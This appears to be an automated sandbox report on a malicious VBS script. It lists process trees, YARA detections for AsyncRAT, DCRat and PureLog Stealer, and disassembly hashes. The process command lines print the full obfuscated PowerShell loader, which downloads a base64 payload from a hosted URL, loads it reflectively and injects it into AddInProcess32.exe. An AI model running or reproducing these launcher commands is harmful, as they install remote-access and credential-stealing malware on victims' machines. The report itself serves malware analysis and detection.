7ff2D+IiM25SbzFmOt92YtQnZvN3byNWat1ych1WZoN2c64mc1JSPz5GbthHIvZmbJR3c1JHd8ACIK0gPvICcwFmLu9Wa0F2YpxGcwFUeNJSPl1WYuBiIw4yNuAjLxISPu9WazJXZ2BSe0lGduVGZJlHbi1WZzNXY8ACIK0gPiEjdu02chpTbvNWL0Z2bz9mcjlWbtMXYtVGajNnOuJXdi0zcuxWb4BiIw4SMi0jbvl2cyVmV0NXZmlmbh1GI
2024-10-02 03:28:20 UTC	1369	IN	Data Raw: 47 41 41 41 51 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 67 44 41 41 41 51 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 46 41 41 41 41 47 41 43 41 41 67 41 41 41 41 41 42 41 43 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: GAAAQAAEAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAEAAAAAAAAAAAAAAAAAAAAIAAgDAAAQAAEAAAAAAAAAAAAAAAAAAAAIAAAFAAAAGACAAgAAAAABACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-10-02 03:28:20 UTC	1369	IN	Data Raw: 42 64 55 6d 45 46 30 68 44 48 63 41 44 4f 77 68 41 48 51 41 47 56 4a 52 48 49 67 77 41 67 67 41 48 49 45 41 41 45 45 77 45 41 4d 68 41 54 49 41 49 49 77 42 45 4e 46 42 45 56 4a 52 44 43 4b 52 41 45 41 53 44 4e 46 52 65 42 4b 52 41 41 63 41 50 53 30 55 45 63 55 6c 45 59 55 6c 45 64 67 6a 45 5a 4a 42 43 48 45 68 41 38 49 52 56 53 4d 51 55 53 55 52 43 41 4a 52 41 48 51 41 41 54 30 42 41 67 55 67 44 42 6b 68 45 56 55 51 42 43 4b 42 41 67 55 51 39 42 4b 42 41 67 55 51 38 42 4b 42 41 67 55 51 41 43 4b 52 41 42 41 69 42 31 48 6f 45 49 49 77 42 47 30 65 67 52 34 67 41 43 41 79 42 35 46 6f 45 49 45 41 41 47 34 51 43 73 45 42 47 45 63 77 42 70 48 6f 45 42 45 41 49 47 45 65 67 52 34 51 41 43 41 79 42 63 34 51 41 43 41 53 42 4f 34 67 44 4f 4d 41 41 47 55 64 67 52 34 Data Ascii: BdUmEF0hDHcADOwhAHQAGVJRHIgwAggAHIEAAEEwEAMhATIAIIwBENFBEVJRDCKRAEASDNFReBKRAAcAPS0UEcUlEYUlEdgjEZJBCHEhA8IRVSMQUSURCAJRAHQAAT0BAgUgDBkhEVUQBCKBAgUQ9BKBAgUQ8BKBAgUQACKRABAiB1HoEIIwBG0egR4gACAyB5FoEIEAAG4QCsEBGEcwBpHoEBEAIGEegR4QACAyBc4QACASBO4gDOMAAGUdgR4
2024-10-02 03:28:20 UTC	1369	IN	Data Raw: 74 46 6d 63 47 52 68 44 55 42 51 41 77 34 43 4e 32 31 6a 62 76 6c 32 63 79 56 6d 56 73 73 6d 63 76 64 58 5a 74 46 6d 63 47 52 56 52 4f 35 69 47 41 45 77 52 41 41 41 4d 75 63 6a 4c 77 34 53 4d 48 41 51 41 4d 41 41 41 41 41 51 41 46 41 41 41 41 41 41 41 43 41 51 41 49 30 49 67 52 45 51 41 67 59 51 41 7a 64 33 62 79 68 47 56 75 39 57 61 30 42 58 5a 6a 68 58 52 75 39 6d 54 77 46 6d 63 58 5a 68 41 55 42 51 41 41 45 67 48 41 41 41 41 41 41 41 43 41 45 41 43 49 45 51 41 67 51 41 6b 41 47 68 42 45 6f 51 66 53 45 67 41 41 59 77 43 39 4a 52 41 43 41 67 42 43 30 6e 45 42 49 41 41 47 77 51 66 53 45 67 41 41 59 51 44 39 4a 52 41 43 41 67 42 46 30 52 66 53 45 67 41 41 63 67 44 39 4a 52 41 43 41 67 42 39 4a 52 41 42 41 51 42 39 4a 52 42 4f 49 41 41 47 30 6e 45 4f 45 41 Data Ascii: tFmcGRhDUBQAw4CN21jbvl2cyVmVssmcvdXZtFmcGRVRO5iGAEwRAAAMucjLw4SMHAQAMAAAAAQAFAAAAAAACAQAI0IgREQAgYQAzd3byhGVu9Wa0BXZjhXRu9mTwFmcXZhAUBQAAEgHAAAAAAACAEACIEQAgQAkAGhBEoQfSEgAAYwC9JRACAgBC0nEBIAAGwQfSEgAAYQD9JRACAgBF0RfSEgAAcgD9JRACAgB9JRABAQB9JRBOIAAG0nEOEA
2024-10-02 03:28:20 UTC	1369	IN	Data Raw: 41 41 43 45 6f 41 41 49 4d 51 42 64 41 41 43 45 45 68 45 41 67 41 42 4e 49 42 41 49 51 67 44 42 45 41 41 45 67 6e 45 42 45 41 41 46 77 52 41 42 41 41 42 70 49 52 41 42 41 51 42 6c 45 52 49 53 30 68 45 63 49 41 42 41 6f 67 44 43 45 41 41 45 67 51 41 42 41 41 42 49 41 41 41 44 77 42 41 41 4d 67 41 42 45 41 41 45 55 68 45 42 45 41 41 46 55 68 45 41 41 41 42 4b 45 51 41 41 51 67 43 41 41 77 41 46 30 52 41 42 41 51 42 46 30 42 41 41 51 51 45 53 45 51 41 41 55 51 45 53 41 41 41 45 30 67 45 42 45 41 41 46 30 67 45 41 41 41 42 34 4a 52 41 5a 49 52 46 47 63 41 43 47 49 41 48 47 49 67 41 47 49 51 46 53 59 77 41 4b 59 67 41 46 30 68 42 44 45 68 45 47 4d 51 44 53 59 77 41 43 41 41 41 44 67 6d 45 47 4d 51 43 53 59 77 41 4f 59 67 41 42 41 41 49 44 45 41 41 41 4d 51 69 Data Ascii: AACEoAAIMQBdAACEEhEAgABNIBAIQgDBEAAEgnEBEAAFwRABAABpIRABAQBlERIS0hEcIABAogDCEAAEgQABAABIAAADwBAAMgABEAAEUhEBEAAFUhEAAABKEQAAQgCAAwAF0RABAQBF0BAAQQESEQAAUQESAAAE0gEBEAAF0gEAAAB4JRAZIRFGcACGIAHGIgAGIQFSYwAKYgAF0hBDEhEGMQDSYwACAAADgmEGMQCSYwAOYgABAAIDEAAAMQi
2024-10-02 03:28:20 UTC	1369	IN	Data Raw: 67 62 41 6b 47 41 74 42 41 5a 41 45 30 43 41 41 67 62 41 38 47 41 70 42 77 63 41 49 48 41 6c 42 67 56 50 41 41 41 6f 42 41 64 41 45 47 41 51 6c 41 41 41 45 47 41 79 42 51 5a 41 30 47 41 68 42 77 51 4e 41 41 41 30 42 51 61 41 49 47 41 79 41 77 4d 4c 41 41 41 6c 42 77 63 41 77 47 41 68 42 67 52 4c 41 41 41 30 42 51 61 41 49 47 41 30 41 67 4e 4c 41 41 41 6c 42 51 64 41 49 48 41 55 6c 41 41 41 41 79 41 41 41 41 64 41 59 47 41 76 42 77 63 41 38 47 41 79 42 77 59 41 6b 47 41 4e 4e 42 41 41 4d 46 41 50 56 41 41 41 49 48 41 6c 42 77 63 41 55 56 43 41 41 41 52 41 6b 45 41 58 42 41 53 4a 41 41 41 76 42 67 5a 41 34 47 41 4a 42 41 64 41 34 47 41 6c 42 51 61 41 77 47 41 44 56 42 41 41 51 45 41 4a 42 77 56 41 67 45 41 67 41 67 63 41 49 48 41 46 46 42 41 41 49 44 41 34 Data Ascii: gbAkGAtBAZAE0CAAgbA8GApBwcAIHAlBgVPAAAoBAdAEGAQlAAAEGAyBQZA0GAhBwQNAAA0BQaAIGAyAwMLAAAlBwcAwGAhBgRLAAA0BQaAIGA0AgNLAAAlBQdAIHAUlAAAAyAAAAdAYGAvBwcA8GAyBwYAkGANNBAAMFAPVAAAIHAlBwcAUVCAAARAkEAXBASJAAAvBgZA4GAJBAdA4GAlBQaAwGADVBAAQEAJBwVAgEAgAgcAIHAFFBAAIDA4

Target ID:	0
Start time:	23:28:11
Start date:	01/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1iH5ABLKIA.vbs"
Imagebase:	0x7ff6f38f0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	23:28:12
Start date:	01/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	23:28:12
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	23:28:14
Start date:	01/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.2257689988.000002198F4E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.2257689988.000002198F4E4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.2297059905.00000219A7700000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.2274321947.000002199F4DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	23:28:19
Start date:	01/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0x490000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000005.00000002.3465673690.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000005.00000002.3465673690.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000005.00000002.3466547195.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000005.00000002.3466547195.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 00000005.00000002.3468761215.0000000002811000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000005.00000002.3468761215.0000000002811000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Function 00007FFD347A37B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2321629485.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd347a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction ID: 66fa72871b3f3c64a9f031addf7520cc42c6ac513a8443dac0ff2400dedf8c1d
Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction Fuzzy Hash: C001677121CB0D8FD744EF0CE491AA6B7E0FB95364F10056DE58AC3651D636E882CB45

Non-executed Functions

Function 00007FFD347A25FA Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2321629485.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd347a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5178af72c482c56a9010bd2d33d82e0b20f5e146201026224f2bb63b86f113fe
Instruction ID: 04d8a1a7fbf6e9687f2f265d16782b791fcb2a7247a792200742ab32f442321a
Opcode Fuzzy Hash: 5178af72c482c56a9010bd2d33d82e0b20f5e146201026224f2bb63b86f113fe
Instruction Fuzzy Hash: 3A715497A0E7C25BE763463858BA0EA3FA4DF5326470D10F7D6C4CA2939D0D2817A362

Function 00007FFD347A29FA Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2321629485.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd347a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c70351e21a16446dbeccc57c4c38783f92100c2a6d3219eee7b763555c486f35
Instruction ID: e75f5602a3765362e9163025fdddc4c423f6252625c1187db8514fa5fed89ee4
Opcode Fuzzy Hash: c70351e21a16446dbeccc57c4c38783f92100c2a6d3219eee7b763555c486f35
Instruction Fuzzy Hash: E4518496B0E7D25BD263577868B60E53FA0DF0325470D00F7C6C8DA2A3D90D282BE3A1

Analysis Process: powershell.exePID: 2144, Parent PID: 4000COMMON

Executed Functions

Function 00007FFD34870002 Relevance: 1.9, Instructions: 1929COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2300906057.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34870000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fa31b414d042cde1598bd9efd3a8a0cb5ccd6b56a3507a464d604de1c387228
Instruction ID: 634e8cbaed7e265cdf335488abd019813c1e75c017427607a0cc1f23aabeca4a
Opcode Fuzzy Hash: 4fa31b414d042cde1598bd9efd3a8a0cb5ccd6b56a3507a464d604de1c387228
Instruction Fuzzy Hash: F2C21522B0DB8A4FE7969B6848B52B57FE1EF57210B0841FBD18DC71A3D91CAC45D382

Function 00007FFD347B0A71 Relevance: 1.0, Instructions: 1041COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2300466584.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd347a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18eaceddeb228cb5543c234949f758fdd9fbafab4043f62ddb65195bd8b1eb3b
Instruction ID: fe2093b838445900ec28d8b4599e7ac7465a6bce3b6c650e0116a6e7a4d854c8
Opcode Fuzzy Hash: 18eaceddeb228cb5543c234949f758fdd9fbafab4043f62ddb65195bd8b1eb3b
Instruction Fuzzy Hash: 14F1D172A0D6998FEB51DB2888A56EA7BB0EF17314F0401FBC149D7193DE786C46CB81

Function 00007FFD34870FC2 Relevance: 4.8, Instructions: 4751COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2300906057.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34870000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd5d054c4e499e78e2b84233a70c1068284d9a7c8a3a4869508bbba27d5276a7
Instruction ID: 2e25a3f5b43c894f6f5f8991d9606e0920c1ce594ffcf90f6eba5b9017a3de18
Opcode Fuzzy Hash: bd5d054c4e499e78e2b84233a70c1068284d9a7c8a3a4869508bbba27d5276a7
Instruction Fuzzy Hash: 5473957161CB898FDB65DB1CC895996BBE1FFA9700F14469EC088C7296DE30F841CB86

Function 00007FFD347A3AF7 Relevance: 2.2, Strings: 1, Instructions: 905COMMON

Download Yara Rule

Strings

`Y_H, xrefs: 00007FFD347A41DE

Memory Dump Source

Source File: 00000004.00000002.2300466584.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd347a0000_powershell.jbxd

Similarity

API ID:
String ID: `Y_H
API String ID: 0-1009497369
Opcode ID: 69cf3daa5fd7140312ecfba0d4adb14970ecd4d804972dbae7ac93539c1126ff
Instruction ID: 42aba9e0649657d85baf06390b7f5926324d3215925ea0000675e17506532aae
Opcode Fuzzy Hash: 69cf3daa5fd7140312ecfba0d4adb14970ecd4d804972dbae7ac93539c1126ff
Instruction Fuzzy Hash: B222F371B1CA498FDB94EF5CC495AA9BBE1FF69310F14017AD449C7296CA29F842CBC0

Function 00007FFD348755BE Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2300906057.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34870000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8243a3e89bd258a4837376c1a351f2410e5bcea1b8d5774357202e992e7b8ef
Instruction ID: 378bf790adb5005de55fec6428ce1bc4753b73d1bdfac94351ff847e1e52c615
Opcode Fuzzy Hash: e8243a3e89bd258a4837376c1a351f2410e5bcea1b8d5774357202e992e7b8ef
Instruction Fuzzy Hash: DD51F522F1FE464BF7E9976808F52B96BC2EF96390B5840BED24EC75D3DD0CA8016241

Function 00007FFD3487560A Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2300906057.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34870000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45e201ee7b0539a53361fafbedbe06888d38052bb40dcf5ef48d4b80e2bd9d8c
Instruction ID: 4a45caf392563393a77ac6599387d029070d5745e5b9924e038c9fbd8c65dfdd
Opcode Fuzzy Hash: 45e201ee7b0539a53361fafbedbe06888d38052bb40dcf5ef48d4b80e2bd9d8c
Instruction Fuzzy Hash: 9E41D252F0FA874BF7E9972808F52B96AC2EF96290B58407ED64EC75D2DD0DA8017241

Function 00007FFD347B0A0D Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2300466584.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd347a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bda7949934d61e3d0a82aa4deffec2380ced5625842c28ba5d3831ce655e328
Instruction ID: fe36ca040c36b717dfb847e338c4025e909e4d8ab8fc0cb7bbc871a97ff5a550
Opcode Fuzzy Hash: 7bda7949934d61e3d0a82aa4deffec2380ced5625842c28ba5d3831ce655e328
Instruction Fuzzy Hash: 6A118E71A0868D8FDB95DF58C8A26ED7BE0FF56300F4404B6E40CC7192CA78A964D780

Function 00007FFD347A4895 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2300466584.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd347a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54c2843a19106934bff848ec9ce532016a0b68c9bde24b701e6902d4ff0829bf
Instruction ID: 3fab43c8e3f1ebacb02974ba4ffe4a082c20f8f3a9a5650f8b0a0d1f495d6148
Opcode Fuzzy Hash: 54c2843a19106934bff848ec9ce532016a0b68c9bde24b701e6902d4ff0829bf
Instruction Fuzzy Hash: F901677121CB0C8FD744EF4CE451AA5B7E0FB95364F10056DE58AC3655D636E881CB46

Function 00007FFD347B08CD Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2300466584.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd347a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af6d2b704d18146025955270fc6ca7359a10e88510fb7dd58638bf694f43baf8
Instruction ID: 4eb49a52eb01ce8db1c869c261293e25a06efa4ce08d5fa37a2bc2c5463267f7
Opcode Fuzzy Hash: af6d2b704d18146025955270fc6ca7359a10e88510fb7dd58638bf694f43baf8
Instruction Fuzzy Hash: C701677190C68D9FEB95DF2884996A97BF0FF55310F4401BAD508C6151DA78A994C780

Non-executed Functions

Function 00007FFD347A9009 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2300466584.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd347a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 445f55a94bec8808f3698916efba77d6be35185d0b53b632819ecb728b5eb37c
Instruction ID: 8147ac8dabc31d97bac607826029cce7e00c0ed46575b35f1477d03539d73c7f
Opcode Fuzzy Hash: 445f55a94bec8808f3698916efba77d6be35185d0b53b632819ecb728b5eb37c
Instruction Fuzzy Hash: AD5120A284E7C24FD7038B708C755907FB0AF17214B4E49EBC4D0CF0A3E6596A5AD762

Analysis Process: AddInProcess32.exePID: 5792, Parent PID: 2144COMMON

Execution Graph

Execution Coverage:	16.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	24
Total number of Limit Nodes:	1

Executed Functions

Function 00D62074 Relevance: 1.6, APIs: 1, Instructions: 78
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?), ref: 00D62111

Memory Dump Source

Source File: 00000005.00000002.3468259283.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d60000_AddInProcess32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: dcb54248012e02e6ae542eed05f1fbaf13845a0f28db3e1acce2d1602f4867f7
Instruction ID: ef8938f44627dc9c56aecb148641bb6f744cc478da1a06e528952cbfa0672fa2
Opcode Fuzzy Hash: dcb54248012e02e6ae542eed05f1fbaf13845a0f28db3e1acce2d1602f4867f7
Instruction Fuzzy Hash: 7C3101B0D05248DFDB14CFA8C688BDDBFF1AF89314F248019E505AB260C7B86945CFA0

Function 00D62080 Relevance: 1.6, APIs: 1, Instructions: 71
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?), ref: 00D62111

Memory Dump Source

Source File: 00000005.00000002.3468259283.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d60000_AddInProcess32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d61edb99043ca692121d595eecdf5d8bf5178f001082fe082dbc644a24cba108
Instruction ID: ab85568b63dd4ca1ddc2b85682bf58c80173a46296508eb714e0dce3c6588177
Opcode Fuzzy Hash: d61edb99043ca692121d595eecdf5d8bf5178f001082fe082dbc644a24cba108
Instruction Fuzzy Hash: D831E2B0D01248DFDB14CF99C684BDDBBF5AF89314F248019E509BB354DBB86945CBA0

Function 00D622D1 Relevance: 1.6, APIs: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 00D6234C

Memory Dump Source

